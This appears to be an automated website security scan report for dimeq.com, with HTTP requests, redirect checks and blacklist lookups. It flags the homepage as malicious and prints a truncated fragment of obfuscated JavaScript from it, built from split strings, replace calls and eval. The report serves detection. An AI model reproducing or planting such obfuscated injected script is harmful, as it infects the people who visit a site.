Scanned pages/files
Request | Server response | Status |
http://dimeq.com/ | 200 OK Content-Length: 6295 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WH9Ri1Tx="9M5164M51R28M";var UDflhRL="DM5164M";var vbHMAgLN="yw6Hy6wHy79Hy6";var g507zG="ce(/M51/g,'%";var PirUVF="d%2F3Md%66";var MEa8="3Md%693Md%613Md";var iBZ79HM="%703Md";var B0SCnI="M51ci%6M5161M5";var fLqFAjl="z.replace";var rV1G8F="place(";var j334uwQ0="5154M5153M51R2";var tba9puL="ywp6Cywp";var WGPXHiAh="B';eval(u";var m4j9VB="5165M516EM";var zj8XDT="p27ywp";var O1YG9nr="165M51R2ci%M5";var A0typu1w="));var P";var IzVJ="wHy61Hyw8Hy53";var vR9HMJ="29M513B";var d8QR="(djsZ.replace(";var Antivirus reports:
| ||
http://dimeq.com/index2.htm | 200 OK Content-Length: 787 Content-Type: text/html | clean |
http://dimeq.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dimeq.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 13:36:27 GMT
Accept-Ranges: bytes
ETag: "c582f2-1897-3d2927cae7c40"
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Length: 6295
Content-Type: text/html
Last-Modified: Thu, 05 Feb 2004 03:25:29 GMT
...6295 bytes of data.
GET / HTTP/1.1
Host: dimeq.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 13:36:27 GMT
Accept-Ranges: bytes
ETag: "c582f2-1897-3d2927cae7c40"
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Length: 6295
Content-Type: text/html
Last-Modified: Thu, 05 Feb 2004 03:25:29 GMT
...6295 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dimeq.com
Referer: http://www.google.com/search?q=dimeq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dimeq.com
Referer: http://www.google.com/search?q=dimeq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dimeq.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dimeq.com/
Result: dimeq.com is not infected or malware details are not published yet.
Result: dimeq.com is not infected or malware details are not published yet.